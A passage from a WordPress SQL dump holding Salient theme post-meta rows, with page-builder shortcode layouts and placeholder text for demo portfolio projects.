portfolio-display','a:1:{i:0;s:3:\"all\";}'),(104,25,'nectar-metabox-portfolio-display-sortable','off'),(105,25,'_nectar_slider_bg_type','image_bg'),(106,25,'_nectar_canvas_shapes',''),(107,25,'_nectar_media_upload_webm',''),(108,25,'_nectar_media_upload_mp4',''),(109,25,'_nectar_media_upload_ogv',''),(110,25,'_nectar_slider_preview_image',''),(111,25,'_nectar_header_bg',''),(112,25,'_nectar_header_parallax','off'),(113,25,'_nectar_header_box_roll','off'),(114,25,'_nectar_header_bg_height',''),(115,25,'_nectar_header_fullscreen','off'),(116,25,'_nectar_header_title',''),(117,25,'_nectar_header_subtitle',''),(118,25,'_nectar_page_header_text-effect','none'),(119,25,'_nectar_particle_rotation_timing',''),(120,25,'_nectar_particle_disable_explosion','off'),(121,25,'_nectar_page_header_alignment','left'),(122,25,'_nectar_page_header_alignment_v','middle'),(123,25,'_nectar_page_header_bg_alignment','center'),(124,25,'_nectar_header_bg_color',''),(125,25,'_nectar_header_font_color',''),(126,25,'_disable_transparent_header','off'),(127,25,'_force_transparent_header','on'),(128,32,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(129,32,'_wp_page_template','default'),(130,32,'_wpb_vc_js_status','true'),(131,32,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(132,32,'nectar-metabox-portfolio-display-sortable','off'),(133,32,'_nectar_slider_bg_type','image_bg'),(134,32,'_nectar_canvas_shapes',''),(135,32,'_nectar_media_upload_webm',''),(136,32,'_nectar_media_upload_mp4',''),(137,32,'_nectar_media_upload_ogv',''),(138,32,'_nectar_slider_preview_image',''),(139,32,'_nectar_header_bg',''),(140,32,'_nectar_header_parallax','off'),(141,32,'_nectar_header_box_roll','off'),(142,32,'_nectar_header_bg_height',''),(143,32,'_nectar_header_fullscreen','off'),(144,32,'_nectar_header_title',''),(145,32,'_nectar_header_subtitle',''),(146,32,'_nectar_page_header_text-effect','none'),(147,32,'_nectar_particle_rotation_timing',''),(148,32,'_nectar_particle_disable_explosion','off'),(149,32,'_nectar_page_header_alignment','left'),(150,32,'_nectar_page_header_alignment_v','middle'),(151,32,'_nectar_page_header_bg_alignment','center'),(152,32,'_nectar_header_bg_color',''),(153,32,'_nectar_header_font_color',''),(154,32,'_disable_transparent_header','off'),(155,32,'_force_transparent_header','on'),(156,62,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(157,62,'_wpb_vc_js_status','true'),(158,62,'_nectar_portfolio_extra_content','[vc_row type=\"full_width_background\" bg_color=\"#1e83ec\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n<h6>Briefing</h6>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#1e83ec\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text css=\".vc_custom_1451884222864{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6>Project</h6>\r\nAction photography of vaious bikers\r\n[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451884227619{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6>Client</h6>\r\nHalf Giant Inc.[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451884235241{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6>What We Did</h6>\r\nPhotography, Graphic Design, Post Editing[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" overlay_strength=\"1\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/4\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n\r\nHot Looks\r\n\r\nUt elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/4\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\" delay=\"400\"][vc_column_text]\r\n\r\nEasy Interface\r\n\r\nUt elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/4\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\" delay=\"800\"][vc_column_text]\r\n\r\nTrue Power\r\n\r\nUt elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/4\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\" delay=\"1200\"][vc_column_text]\r\n\r\nSolid Code\r\n\r\nUt elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_gallery type=\"flickity_style\" onclick=\"link_no\" img_size=\"full\"][/vc_column][/vc_row]'),(159,62,'_nectar_portfolio_item_layout','enabled'),(160,62,'_nectar_portfolio_custom_grid_item','off'),(161,62,'_nectar_portfolio_custom_grid_item_content',''),(162,62,'_nectar_portfolio_custom_thumbnail',''),(163,62,'_nectar_hide_featured','on'),(164,62,'_portfolio_item_masonry_sizing','wide_tall'),(165,62,'_portfolio_item_masonry_content_pos','middle'),(166,62,'_nectar_external_project_url',''),(167,62,'nectar-metabox-portfolio-parent-override','default'),(168,62,'_nectar_project_excerpt','Grab a helmet and let\'s go'),(169,62,'_nectar_project_accent_color','#36c1ef'),(170,62,'_nectar_project_title_color',''),(171,62,'_nectar_project_subtitle_color',''),(172,62,'_nectar_header_bg',''),(173,62,'_nectar_header_parallax','off'),(174,62,'_nectar_header_bg_height','400'),(175,62,'_nectar_header_bg_color','#2b2b2b'),(176,62,'_nectar_header_subtitle','style is everything'),(177,62,'_nectar_header_font_color',''),(178,62,'_disable_transparent_header','off'),(179,62,'_nectar_video_m4v',''),(180,62,'_nectar_video_ogv',''),(181,62,'_nectar_video_height',''),(182,62,'_nectar_video_poster',''),(183,62,'_nectar_video_embed',''),(184,67,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(185,67,'_wpb_vc_js_status','true'),(186,67,'_nectar_portfolio_extra_content','[vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n<h6><span style=\"color: #50d18d;\">Overview</span></h6>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"4%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy.[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text css=\".vc_custom_1451934363103{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18d;\">Project</span></h6>\r\nWaveform Concept Design[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451934370844{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18d;\">Client</span></h6>\r\nThe People Inc.[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451934352663{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18d;\">What We Did</span></h6>\r\nCompany Branding, Responsive Web Design[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_content\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-10-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/2\"][split_line_heading]\r\n<h3><span style=\"color: #50d18d;\">The Big Oxmox advised</span></h3>\r\n<h3><span style=\"color: #50d18d;\">her not to do so, because there</span></h3>\r\n<h3><span style=\"color: #50d18d;\">were thousands of devious Semikoli</span></h3>\r\n[/split_line_heading][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column enable_animation=\"true\" animation=\"reveal-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color=\"#212121\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/2\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\"][vc_column enable_animation=\"true\" animation=\"reveal-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color=\"#282828\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/2\"][/vc_column][vc_column column_padding=\"padding-10-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/2\"][split_line_heading]\r\n<h3><span style=\"color: #50d18d;\">The Big Oxmox advised</span></h3>\r\n<h3><span style=\"color: #50d18d;\">her not to do so, because there</span></h3>\r\n<h3><span style=\"color: #50d18d;\">were thousands of devious Semikoli</span></h3>\r\n[/split_line_heading][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]'),(187,67,'_nectar_portfolio_item_layout','enabled'),(188,67,'_nectar_portfolio_custom_grid_item','off'),(189,67,'_nectar_portfolio_custom_grid_item_content',''),(190,67,'_nectar_portfolio_custom_thumbnail',''),(191,67,'_nectar_hide_featured','on'),(192,67,'_portfolio_item_masonry_sizing','regular'),(193,67,'_portfolio_item_masonry_content_pos','middle'),(194,67,'_nectar_external_project_url',''),(195,67,'nectar-metabox-portfolio-parent-override','default'),(196,67,'_nectar_project_excerpt','A short film'),(197,67,'_nectar_project_accent_color','#78e3ab'),(198,67,'_nectar_project_title_color',''),(199,67,'_nectar_project_subtitle_color',''),(200,67,'_nectar_header_bg',''),(201,67,'_nectar_header_parallax','on'),(202,67,'_nectar_header_bg_height','400'),(203,67,'_nectar_header_bg_color','#1e1e1e'),(204,67,'_nectar_header_subtitle',''),(205,67,'_nectar_header_font_color',''),(206,67,'_disable_transparent_header','off'),(207,67,'_nectar_video_m4v',''),(208,67,'_nectar_video_ogv',''),(209,67,'_nectar_video_height',''),(210,67,'_nectar_video_poster',''),(211,67,'_nectar_video_embed',''),(212,69,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(213,69,'_wpb_vc_js_status','true'),(214,69,'_nectar_portfolio_extra_content','[vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n<h2><span style=\"color: #1e83ec;\">Overview</span></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"4%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text css=\".vc_custom_1451929836056{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #1e83ec;\">Project</span></h6>\r\n<span style=\"color: #999999;\">Night Sky Desktop &amp; Mobile Application</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451929848432{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #1e83ec;\">Client</span></h6>\r\n<span style=\"color: #999999;\">Good People</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451931742846{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #1e83ec;\">What We Did</span></h6>\r\n<span style=\"color: #999999;\">UI/UX Design, Responsive Web Design</span>[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"2/3\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">We Delivered An App</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Of Individuality, Eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Abnormality, and Humors.</span></h2>\r\n[/split_line_heading][vc_row_inner][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" width=\"1/1\"][vc_column_text]<span style=\"color: #999999;\">She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove</span>,[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_gallery type=\"flickity_style\" onclick=\"link_no\" img_size=\"full\"][/vc_column][/vc_row]'),(215,69,'_nectar_portfolio_item_layout','enabled'),(216,69,'_nectar_portfolio_custom_grid_item','off'),(217,69,'_nectar_portfolio_custom_grid_item_content',''),(218,69,'_nectar_portfolio_custom_thumbnail',''),(219,69,'_nectar_hide_featured','on'),(220,69,'_portfolio_item_masonry_sizing','regular'),(221,69,'_portfolio_item_masonry_content_pos','middle'),(222,69,'_nectar_external_project_url',''),(223,69,'nectar-metabox-portfolio-parent-override','default'),(224,69,'_nectar_project_excerpt','A simple application for Andriod'),(225,69,'_nectar_project_accent_color',''),(226,69,'_nectar_project_title_color',''),(227,69,'_nectar_project_subtitle_color',''),(228,69,'_nectar_header_bg',''),(229,69,'_nectar_header_parallax','off'),(230,69,'_nectar_header_bg_height','400'),(231,69,'_nectar_header_bg_color','#0a0a0a'),(232,69,'_nectar_header_subtitle','Track The Sky'),(233,69,'_nectar_header_font_color',''),(234,69,'_disable_transparent_header','off'),(235,69,'_nectar_video_m4v',''),(236,69,'_nectar_video_ogv',''),(237,69,'_nectar_video_height',''),(238,69,'_nectar_video_poster',''),(239,69,'_nectar_video_embed',''),(240,69,'_wp_old_slug','nigh-sky-app'),(241,69,'_nectar_love','0'),(242,92,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(243,92,'_wpb_vc_js_status','true'),(244,92,'_nectar_portfolio_extra_content','[vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][vc_column_text]\r\n<h2><span style=\"color: #50d18e;\">Overview</span></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_color=\"#f9f9f9\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"4%\" overlay_strength=\"0.3\"][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text]<span style=\"color: #999999;\">She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy.</span>[/vc_column_text][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/3\"][vc_column_text css=\".vc_custom_1451938109211{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18e;\">Project</span></h6>\r\n<span style=\"color: #999999;\">Salient Blog Design</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451938068907{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18e;\">Client</span></h6>\r\n<span style=\"color: #999999;\">ThemeNectar</span>[/vc_column_text][divider line_type=\"No Line\" custom_height=\"30\"][vc_column_text css=\".vc_custom_1451938112790{border-top-width: 2px !important;border-right-width: 2px !important;border-bottom-width: 2px !important;border-left-width: 2px !important;padding-top: 40px !important;padding-right: 40px !important;padding-bottom: 40px !important;padding-left: 40px !important;border-left-color: #0a0a0a !important;border-left-style: solid !important;border-right-color: #0a0a0a !important;border-right-style: solid !important;border-top-color: #0a0a0a !important;border-top-style: solid !important;border-bottom-color: #0a0a0a !important;border-bottom-style: solid !important;}\"]\r\n<h6><span style=\"color: #50d18e;\">What We Did</span></h6>\r\n<span style=\"color: #999999;\">UI/UX Design, Responsive Web Design</span>[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" bg_image=\"6225\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"center\" top_padding=\"22%\" bottom_padding=\"22%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.8\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" width=\"1/1\"][nectar_video_lightbox link_style=\"play_button\" video_url=\"https://www.youtube.com/watch?v=6oTurM7gESE\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" overlay_strength=\"0.3\"][vc_column column_padding=\"no-extra-padding\" 